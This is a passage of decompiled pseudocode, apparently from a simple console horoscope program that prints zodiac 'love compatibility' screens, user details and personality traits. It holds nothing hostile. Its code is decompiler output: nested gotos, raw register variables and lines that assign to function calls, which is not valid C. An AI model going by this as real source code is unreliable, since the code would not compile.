																																										__eax = E013D5310(__ebx,  *0x13fe242 & 0x000000ff, __edi, __esi, __eflags, __eax, _v56, 0x13fe210,  *0x13fe242 & 0x000000ff);
																																										__eax = _v52;
																																										__esp = __esp + 0x10;
																																										__eflags = __eax - 0xa;
																																										if(__eax != 0xa) {
																																											L307:
																																											__eflags = __eax - 0xb;
																																											if(__eax != 0xb) {
																																												goto L313;
																																											} else {
																																												__eax = _v48;
																																												__eflags = __eax - 0x15;
																																												if(__eax > 0x15) {
																																													goto L311;
																																												} else {
																																													goto L309;
																																												}
																																											}
																																										} else {
																																											__eax = _v48;
																																											L305:
																																											__eflags = __eax - 0x17;
																																											if(__eax >= 0x17) {
																																												L309:
																																												__ecx =  *0x13fe242 & 0x000000ff;
																																												__edx = _v56;
																																												_push( *0x13fe242 & 0x000000ff);
																																												_push(0x13fe210);
																																												_push(_v56);
																																												_push(__eax);
																																												L35();
																																												__eax = _v52;
																																												__esp = __esp + 0x10;
																																												__eflags = __eax - 0xb;
																																												if(__eax != 0xb) {
																																													L313:
																																													__eflags = __eax - 0xc;
																																													if(__eax != 0xc) {
																																														goto L319;
																																													} else {
																																														__eax = _v48;
																																														__eflags = __eax - 0x15;
																																														if(__eax > 0x15) {
																																															goto L317;
																																														} else {
																																															goto L315;
																																														}
																																													}
																																												} else {
																																													__eax = _v48;
																																													L311:
																																													__eflags = __eax - 0x16;
																																													if(__eax >= 0x16) {
																																														L315:
																																														__ecx =  *0x13fe242 & 0x000000ff;
																																														__edx = _v56;
																																														_push( *0x13fe242 & 0x000000ff);
																																														_push(0x13fe210);
																																														_push(_v56);
																																														_push(__eax);
																																														L66();
																																														__eax = _v52;
																																														__esp = __esp + 0x10;
																																														__eflags = __eax - 0xc;
																																														if(__eax != 0xc) {
																																															L319:
																																															__eflags = __eax - 1;
																																															if(__eax != 1) {
																																																goto L325;
																																															} else {
																																																__eax = _v48;
																																																__eflags = __eax - 0x13;
																																																if(__eax > 0x13) {
																																																	goto L323;
																																																} else {
																																																	goto L321;
																																																}
																																															}
																																														} else {
																																															__eax = _v48;
																																															L317:
																																															__eflags = __eax - 0x16;
																																															if(__eax >= 0x16) {
																																																L321:
																																																__ecx =  *0x13fe242 & 0x000000ff;
																																																__edx = _v56;
																																																_push( *0x13fe242 & 0x000000ff);
																																																_push(0x13fe210);
																																																_push(_v56);
																																																_push(__eax);
																																																L97();
																																																__eax = _v52;
																																																__esp = __esp + 0x10;
																																																__eflags = __eax - 1;
																																																if(__eax != 1) {
																																																	L325:
																																																	__eflags = __eax - 2;
																																																	if(__eax != 2) {
																																																		goto L331;
																																																	} else {
																																																		__eax = _v48;
																																																		__eflags = __eax - 0x12;
																																																		if(__eax > 0x12) {
																																																			goto L329;
																																																		} else {
																																																			goto L327;
																																																		}
																																																	}
																																																} else {
																																																	__eax = _v48;
																																																	L323:
																																																	__eflags = __eax - 0x14;
																																																	if(__eax >= 0x14) {
																																																		L327:
																																																		__ecx =  *0x13fe242 & 0x000000ff;
																																																		__edx = _v56;
																																																		_push( *0x13fe242 & 0x000000ff);
																																																		_push(0x13fe210);
																																																		_push(_v56);
																																																		_push(__eax);
																																																		L130();
																																																		__eax = _v52;
																																																		__esp = __esp + 0x10;
																																																		__eflags = __eax - 2;
																																																		if(__eax != 2) {
																																																			L331:
																																																			__eflags = __eax - 3;
																																																			if(__eax == 3) {
																																																				__eax = _v48;
																																																				goto L333;
																																																			}
																																																			goto L335;
																																																		} else {
																																																			__eax = _v48;
																																																			L329:
																																																			__eflags = __eax - 0x13;
																																																			if(__eax >= 0x13) {
																																																				goto L334;
																																																			} else {
																																																				__eax = 0;
																																																				__eflags = 0;
																																																				return 0;
																																																			}
																																																		}
																																																	} else {
																																																		__eax = 0;
																																																		__eflags = 0;
																																																		return 0;
																																																	}
																																																}
																																															} else {
																																																__eax = 0;
																																																__eflags = 0;
																																																return 0;
																																															}
																																														}
																																													} else {
																																														__eax = 0;
																																														__eflags = 0;
																																														return 0;
																																													}
																																												}
																																											} else {
																																												__eax = 0;
																																												__eflags = 0;
																																												return 0;
																																											}
																																										}
																																									} else {
																																										__eax = 0;
																																										__eflags = 0;
																																										return 0;
																																									}
																																								}
																																							} else {
																																								__eax = 0;
																																								__eflags = 0;
																																								return 0;
																																							}
																																						}
																																					} else {
																																						__eax = 0;
																																						__eflags = 0;
																																						return 0;
																																					}
																																				}
																																			} else {
																																				__eax = 0;
																																				__eflags = 0;
																																				return 0;
																																			}
																																		}
																																	} else {
																																		__eax = 0;
																																		__eflags = 0;
																																		return 0;
																																	}
																																}
																															} else {
																																__eax = 0;
																																__eflags = 0;
																																return 0;
																															}
																														}
																													} else {
																														L333:
																														__eflags = __eax - 0x14;
																														if(__eax <= 0x14) {
																															L334:
																															__ecx =  *0x13fe242 & 0x000000ff;
																															__edx = _v56;
																															_push( *0x13fe242 & 0x000000ff);
																															_push(0x13fe210);
																															_push(_v56);
																															_push(__eax);
																															L172();
																															__esp = __esp + 0x10;
																														}
																														L335:
																														__eax = 0;
																														__eflags = 0;
																														return 0;
																													}
																												}
																												goto L336;
																											case 6:
																												L195:
																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
																												__eax = _v0;
																												__edx = __edi;
																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																												_push("PISCES AND ARIES LOVE COMPATIBILITY");
																												 *0x13fe250 = 0x80005;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__edx = 0xb;
																												E013D1B90(__ebx, 0xb, __edi) = _v0;
																												_push(_v0);
																												_push(__edi);
																												_push(__ebx);
																												_push(__esi);
																												L172();
																												__esp = 0x20 + __esp;
																												goto L208;
																											case 7:
																												L196:
																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
																												__ecx = _v0;
																												__edx = __edi;
																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																												_push("PISCES AND TAURUS LOVE COMPATIBILITY");
																												 *0x13fe250 = 0x80005;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__edx = 0x16;
																												__eax = E013D1B90(__ebx, 0x16, __edi);
																												__ecx = _v0;
																												_push(_v0);
																												_push(__edi);
																												_push(__ebx);
																												_push(__esi);
																												L172();
																												__esp = 0x20 + __esp;
																												goto L208;
																											case 8:
																												L197:
																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
																												__edx = _v0;
																												__edx = __edi;
																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																												_push("PISCES AND GEMINI LOVE COMPATIBILITY");
																												 *0x13fe250 = 0x80005;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__edx = 0x21;
																												__eax = E013D1B90(__ebx, 0x21, __edi);
																												__edx = _v0;
																												_push(__edx);
																												_push(__edi);
																												_push(__ebx);
																												_push(__esi);
																												L172();
																												__esp = 0x20 + __esp;
																												goto L208;
																											case 9:
																												L198:
																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
																												__eax = _v0;
																												__edx = __edi;
																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																												_push("PISCES AND CANCER LOVE COMPATIBILITY");
																												 *0x13fe250 = 0x80005;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__edx = 0x29;
																												E013D1B90(__ebx, 0x29, __edi) = _v0;
																												_push(_v0);
																												_push(__edi);
																												_push(__ebx);
																												_push(__esi);
																												L172();
																												__esp = 0x20 + __esp;
																												goto L208;
																											case 0xa:
																												L199:
																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
																												__ecx = _v0;
																												__edx = __edi;
																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																												_push("PISCES AND LEO LOVE COMPATIBILITY");
																												 *0x13fe250 = 0x80005;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__edx = 0x31;
																												__eax = E013D1B90(__ebx, 0x31, __edi);
																												__ecx = _v0;
																												_push(_v0);
																												_push(__edi);
																												_push(__ebx);
																												_push(__esi);
																												L172();
																												__esp = 0x20 + __esp;
																												goto L208;
																											case 0xb:
																												L200:
																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
																												__edx = _v0;
																												__edx = __edi;
																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																												_push("PISCES AND VIRGO LOVE COMPATIBILITY");
																												 *0x13fe250 = 0x80005;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__edx = 0x38;
																												__eax = E013D1B90(__ebx, 0x38, __edi);
																												__edx = _v0;
																												_push(__edx);
																												_push(__edi);
																												_push(__ebx);
																												_push(__esi);
																												L172();
																												__esp = 0x20 + __esp;
																												goto L208;
																											case 0xc:
																												L201:
																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
																												__eax = _v0;
																												__edx = __edi;
																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																												_push("PISCES AND LIBRA LOVE COMPATIBILITY");
																												 *0x13fe250 = 0x80005;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__edx = 0x3e;
																												E013D1B90(__ebx, 0x3e, __edi) = _v0;
																												_push(_v0);
																												_push(__edi);
																												_push(__ebx);
																												_push(__esi);
																												L172();
																												__esp = 0x20 + __esp;
																												goto L208;
																											case 0xd:
																												L202:
																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
																												__ecx = _v0;
																												__edx = __edi;
																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																												_push("PISCES AND SCORPIO LOVE COMPATIBILITY");
																												 *0x13fe250 = 0x80005;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__edx = 0x43;
																												__eax = E013D1B90(__ebx, 0x43, __edi);
																												__ecx = _v0;
																												_push(_v0);
																												_push(__edi);
																												_push(__ebx);
																												_push(__esi);
																												L172();
																												__esp = 0x20 + __esp;
																												goto L208;
																											case 0xe:
																												L203:
																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
																												__edx = _v0;
																												__edx = __edi;
																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																												_push("PISCES AND SAGGITARIUS LOVE COMPATIBILITY");
																												 *0x13fe250 = 0x80005;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__edx = 0x47;
																												__eax = E013D1B90(__ebx, 0x47, __edi);
																												__edx = _v0;
																												_push(__edx);
																												_push(__edi);
																												_push(__ebx);
																												_push(__esi);
																												L172();
																												__esp = 0x20 + __esp;
																												goto L208;
																											case 0xf:
																												L204:
																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
																												__eax = _v0;
																												__edx = __edi;
																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																												_push("PISCES AND CAPRICORN LOVE COMPATIBILITY");
																												 *0x13fe250 = 0x80005;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__edx = 0x4a;
																												E013D1B90(__ebx, 0x4a, __edi) = _v0;
																												_push(_v0);
																												_push(__edi);
																												_push(__ebx);
																												_push(__esi);
																												L172();
																												__esp = 0x20 + __esp;
																												goto L208;
																											case 0x10:
																												L205:
																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
																												__ecx = _v0;
																												__edx = __edi;
																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																												_push("PISCES AND AQUARIUS LOVE COMPATIBILITY");
																												 *0x13fe250 = 0x80005;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__edx = 0x4c;
																												__eax = E013D1B90(__ebx, 0x4c, __edi);
																												__ecx = _v0;
																												_push(_v0);
																												_push(__edi);
																												_push(__ebx);
																												_push(__esi);
																												L172();
																												__esp = 0x20 + __esp;
																												goto L208;
																											case 0x11:
																												L206:
																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
																												__edx = _v0;
																												__edx = __edi;
																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																												_push("PISCES AND PISCES LOVE COMPATIBILITY");
																												 *0x13fe250 = 0x80005;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__edx = 0x4d;
																												__eax = E013D1B90(__ebx, 0x4d, __edi);
																												__edx = _v0;
																												_push(__edx);
																												_push(__edi);
																												_push(__ebx);
																												_push(__esi);
																												L172();
																												__esp = 0x20 + __esp;
																												goto L208;
																										}
																										L208:
																										__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																										_push(__edi);
																										_push("Name: %s");
																										 *0x13fe250 = 0x30037;
																										__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																										__ecx = _v36;
																										_push(_v36);
																										_push("Age=%d");
																										 *0x13fe250 = 0x40037;
																										__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																										__ecx = _v40;
																										 *0x13fe250 = 0x50037;
																										_push(E013DC111(_v40));
																										_push("Sex=%c");
																										__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																										__esp = 0x20 + __esp;
																										__eax = E013D1B10();
																										_v52 = "\n*  You are kind and gullible.";
																										_v48 = "\n*  You cannot hurt anyone directly.";
																										_v44 = "\n*  You are adventurous, ambitious, impulsive, enthusiastic and full of energy.";
																										__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
																										__eax = __eax - 1;
																										__eflags = __eax - 5;
																									} while (__eflags <= 0);
																									_pop(__esi);
																									goto L210;
																								}
																								goto L336;
																							case 6:
																								L146:
																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
																								__edx = _v0;
																								__edx = __esi;
																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																								_push("aquarius AND ARIES LOVE COMPATIBILITY");
																								 *0x13fe250 = 0x80005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__edx = 0xa;
																								__eax = E013D1B90(__ebx, 0xa, __edi);
																								__edx = _v0;
																								_push(__edx);
																								_push(__esi);
																								_push(__ebx);
																								_push(__edi);
																								L130();
																								__esp = 0x20 + __esp;
																								goto L159;
																							case 7:
																								L147:
																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
																								__eax = _v0;
																								__edx = __esi;
																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																								_push("aquarius AND TAURUS LOVE COMPATIBILITY");
																								 *0x13fe250 = 0x80005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__edx = 0x15;
																								E013D1B90(__ebx, 0x15, __edi) = _v0;
																								_push(_v0);
																								_push(__esi);
																								_push(__ebx);
																								_push(__edi);
																								L130();
																								__esp = 0x20 + __esp;
																								goto L159;
																							case 8:
																								L148:
																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
																								__ecx = _v0;
																								__edx = __esi;
																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																								_push("aquarius AND GEMINI LOVE COMPATIBILITY");
																								 *0x13fe250 = 0x80005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__edx = 0x20;
																								__eax = E013D1B90(__ebx, 0x20, __edi);
																								__ecx = _v0;
																								_push(_v0);
																								_push(__esi);
																								_push(__ebx);
																								_push(__edi);
																								L130();
																								__esp = 0x20 + __esp;
																								goto L159;
																							case 9:
																								L149:
																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
																								__edx = _v0;
																								__edx = __esi;
																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																								_push("aquarius AND CANCER LOVE COMPATIBILITY");
																								 *0x13fe250 = 0x80005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__edx = 0x28;
																								__eax = E013D1B90(__ebx, 0x28, __edi);
																								__edx = _v0;
																								_push(__edx);
																								_push(__esi);
																								_push(__ebx);
																								_push(__edi);
																								L130();
																								__esp = 0x20 + __esp;
																								goto L159;
																							case 0xa:
																								L150:
																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
																								__eax = _v0;
																								__edx = __esi;
																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																								_push("aquarius AND LEO LOVE COMPATIBILITY");
																								 *0x13fe250 = 0x80005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__edx = 0x30;
																								E013D1B90(__ebx, 0x30, __edi) = _v0;
																								_push(_v0);
																								_push(__esi);
																								_push(__ebx);
																								_push(__edi);
																								L130();
																								__esp = 0x20 + __esp;
																								goto L159;
																							case 0xb:
																								L151:
																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
																								__ecx = _v0;
																								__edx = __esi;
																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																								_push("aquarius AND VIRGO LOVE COMPATIBILITY");
																								 *0x13fe250 = 0x80005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__edx = 0x37;
																								__eax = E013D1B90(__ebx, 0x37, __edi);
																								__ecx = _v0;
																								_push(_v0);
																								_push(__esi);
																								_push(__ebx);
																								_push(__edi);
																								L130();
																								__esp = 0x20 + __esp;
																								goto L159;
																							case 0xc:
																								L152:
																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
																								__edx = _v0;
																								__edx = __esi;
																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																								_push("aquarius AND LIBRA LOVE COMPATIBILITY");
																								 *0x13fe250 = 0x80005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__edx = 0x3d;
																								__eax = E013D1B90(__ebx, 0x3d, __edi);
																								__edx = _v0;
																								_push(__edx);
																								_push(__esi);
																								_push(__ebx);
																								_push(__edi);
																								L130();
																								__esp = 0x20 + __esp;
																								goto L159;
																							case 0xd:
																								L153:
																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
																								__eax = _v0;
																								__edx = __esi;
																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																								_push("aquarius AND SCORPIO LOVE COMPATIBILITY");
																								 *0x13fe250 = 0x80005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__edx = 0x42;
																								E013D1B90(__ebx, 0x42, __edi) = _v0;
																								_push(_v0);
																								_push(__esi);
																								_push(__ebx);
																								_push(__edi);
																								L130();
																								__esp = 0x20 + __esp;
																								goto L159;
																							case 0xe:
																								L154:
																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
																								__ecx = _v0;
																								__edx = __esi;
																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																								_push("aquarius AND SAGGITARIUS LOVE COMPATIBILITY");
																								 *0x13fe250 = 0x80005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__edx = 0x46;
																								__eax = E013D1B90(__ebx, 0x46, __edi);
																								__ecx = _v0;
																								_push(_v0);
																								_push(__esi);
																								_push(__ebx);
																								_push(__edi);
																								L130();
																								__esp = 0x20 + __esp;
																								goto L159;
																							case 0xf:
																								L155:
																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
																								__edx = _v0;
																								__edx = __esi;
																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																								_push("aquarius AND CAPRICORN LOVE COMPATIBILITY");
																								 *0x13fe250 = 0x80005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__edx = 0x49;
																								__eax = E013D1B90(__ebx, 0x49, __edi);
																								__edx = _v0;
																								_push(__edx);
																								_push(__esi);
																								_push(__ebx);
																								_push(__edi);
																								L130();
																								__esp = 0x20 + __esp;
																								goto L159;
																							case 0x10:
																								L156:
																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
																								__eax = _v0;
																								__edx = __esi;
																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																								_push("aquarius AND AQUARIUS LOVE COMPATIBILITY");
																								 *0x13fe250 = 0x80005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__edx = 0x4b;
																								E013D1B90(__ebx, 0x4b, __edi) = _v0;
																								_push(_v0);
																								_push(__esi);
																								_push(__ebx);
																								_push(__edi);
																								L130();
																								__esp = 0x20 + __esp;
																								goto L159;
																							case 0x11:
																								L157:
																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
																								__ecx = _v0;
																								__edx = __esi;
																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																								_push("aquarius AND PISCES LOVE COMPATIBILITY");
																								 *0x13fe250 = 0x80005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__edx = 0x4c;
																								__eax = E013D1B90(__ebx, 0x4c, __edi);
																								__ecx = _v0;
																								_push(_v0);
																								_push(__esi);
																								_push(__ebx);
																								_push(__edi);
																								L130();
																								__esp = 0x20 + __esp;
																								goto L159;
																						}
																						L159:
																						__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																						_push(__esi);
																						_push("Name: %s");
																						 *0x13fe250 = 0x30037;
																						E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = _v36;
																						_push(_v36);
																						_push("Age=%d");
																						 *0x13fe250 = 0x40037;
																						E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = _v40;
																						 *0x13fe250 = 0x50037;
																						_push(E013DC111(_v40));
																						_push("Sex=%c");
																						__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																						_push("Your horoscope sign is Aquarius-The Water Bearer");
																						 *0x13fe250 = 0x20003;
																						__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																						_push("..-\"-._.-\"-._.-");
																						 *0x13fe250 = 0x30005;
																						__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																						_push("..-\"-._.-\"-._.-\n\n");
																						 *0x13fe250 = 0x40005;
																						__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																						__esp = 0x2c + __esp;
																						_v48 = "\n*  You have great desire for material gain.";
																						_v44 = "\n*  You are tireless worker and are willing to work for what you want.";
																						__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
																						__eax = __eax - 1;
																						__eflags = __eax - 5;
																					} while (__eflags <= 0);
																					_pop(__edi);
																					goto L161;
																				}
																				goto L336;
																			case 6:
																				L113:
																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D1A50();
																				__edx = _a4;
																				__edx = __esi;
																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx);
																				_push("CAPRICORN AND ARIES LOVE COMPATIBILITY");
																				 *0x13fe250 = 0x80005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__edx = 9;
																				__eax = E013D1B90(__ebx, 9, __edi);
																				__edx = _a4;
																				_push(__edx);
																				_push(__esi);
																				_push(__ebx);
																				_push(__edi);
																				L97();
																				__esp = 0x20 + __esp;
																				goto L126;
																			case 7:
																				L114:
																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D1A50();
																				__eax = _a4;
																				__edx = __esi;
																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx);
																				_push("CAPRICORN AND TAURUS LOVE COMPATIBILITY");
																				 *0x13fe250 = 0x80005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__edx = 0x14;
																				E013D1B90(__ebx, 0x14, __edi) = _a4;
																				_push(_a4);
																				_push(__esi);
																				_push(__ebx);
																				_push(__edi);
																				L97();
																				__esp = 0x20 + __esp;
																				goto L126;
																			case 8:
																				L115:
																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D1A50();
																				__ecx = _a4;
																				__edx = __esi;
																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx);
																				_push("CAPRICORN AND GEMINI LOVE COMPATIBILITY");
																				 *0x13fe250 = 0x80005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__edx = 0x1e;
																				__eax = E013D1B90(__ebx, 0x1e, __edi);
																				__ecx = _a4;
																				_push(_a4);
																				_push(__esi);
																				_push(__ebx);
																				_push(__edi);
																				L97();
																				__esp = 0x20 + __esp;
																				goto L126;
																			case 9:
																				L116:
																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D1A50();
																				__edx = _a4;
																				__edx = __esi;
																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx);
																				_push("CAPRICORN AND CANCER LOVE COMPATIBILITY");
																				 *0x13fe250 = 0x80005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__edx = 0x27;
																				__eax = E013D1B90(__ebx, 0x27, __edi);
																				__edx = _a4;
																				_push(__edx);
																				_push(__esi);
																				_push(__ebx);
																				_push(__edi);
																				L97();
																				__esp = 0x20 + __esp;
																				goto L126;
																			case 0xa:
																				L117:
																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D1A50();
																				__eax = _a4;
																				__edx = __esi;
																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx);
																				_push("CAPRICORN AND LEO LOVE COMPATIBILITY");
																				 *0x13fe250 = 0x80005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__edx = 0x2f;
																				E013D1B90(__ebx, 0x2f, __edi) = _a4;
																				_push(_a4);
																				_push(__esi);
																				_push(__ebx);
																				_push(__edi);
																				L97();
																				__esp = 0x20 + __esp;
																				goto L126;
																			case 0xb:
																				L118:
																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D1A50();
																				__ecx = _a4;
																				__edx = __esi;
																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx);
																				_push("CAPRICORN AND VIRGO LOVE COMPATIBILITY");
																				 *0x13fe250 = 0x80005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__edx = 0x36;
																				__eax = E013D1B90(__ebx, 0x36, __edi);
																				__ecx = _a4;
																				_push(_a4);
																				_push(__esi);
																				_push(__ebx);
																				_push(__edi);
																				L97();
																				__esp = 0x20 + __esp;
																				goto L126;
																			case 0xc:
																				L119:
																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D1A50();
																				__edx = _a4;
																				__edx = __esi;
																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx);
																				_push("CAPRICORN AND LIBRA LOVE COMPATIBILITY");
																				 *0x13fe250 = 0x80005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__edx = 0x3c;
																				__eax = E013D1B90(__ebx, 0x3c, __edi);
																				__edx = _a4;
																				_push(__edx);
																				_push(__esi);
																				_push(__ebx);
																				_push(__edi);
																				L97();
																				__esp = 0x20 + __esp;
																				goto L126;
																			case 0xd:
																				L120:
																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D1A50();
																				__eax = _a4;
																				__edx = __esi;
																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx);
																				_push("CAPRICORN AND SCORPIO LOVE COMPATIBILITY");
																				 *0x13fe250 = 0x80005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__edx = 0x41;
																				E013D1B90(__ebx, 0x41, __edi) = _a4;
																				_push(_a4);
																				_push(__esi);
																				_push(__ebx);
																				_push(__edi);
																				L97();
																				__esp = 0x20 + __esp;
																				goto L126;
																			case 0xe:
																				L121:
																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D1A50();
																				__ecx = _a4;
																				__edx = __esi;
																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx);
																				_push("CAPRICORN AND SAGGITARIUS LOVE COMPATIBILITY");
																				 *0x13fe250 = 0x80005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__edx = 0x45;
																				__eax = E013D1B90(__ebx, 0x45, __edi);
																				__ecx = _a4;
																				_push(_a4);
																				_push(__esi);
																				_push(__ebx);
																				_push(__edi);
																				L97();
																				__esp = 0x20 + __esp;
																				goto L126;
																			case 0xf:
																				L122:
																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D1A50();
																				__edx = _a4;
																				__edx = __esi;
																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx);
																				_push("CAPRICORN AND CAPRICORN LOVE COMPATIBILITY");
																				 *0x13fe250 = 0x80005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__edx = 0x48;
																				__eax = E013D1B90(__ebx, 0x48, __edi);
																				__edx = _a4;
																				_push(__edx);
																				_push(__esi);
																				_push(__ebx);
																				_push(__edi);
																				L97();
																				__esp = 0x20 + __esp;
																				goto L126;
																			case 0x10:
																				L123:
																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D1A50();
																				__eax = _a4;
																				__edx = __esi;
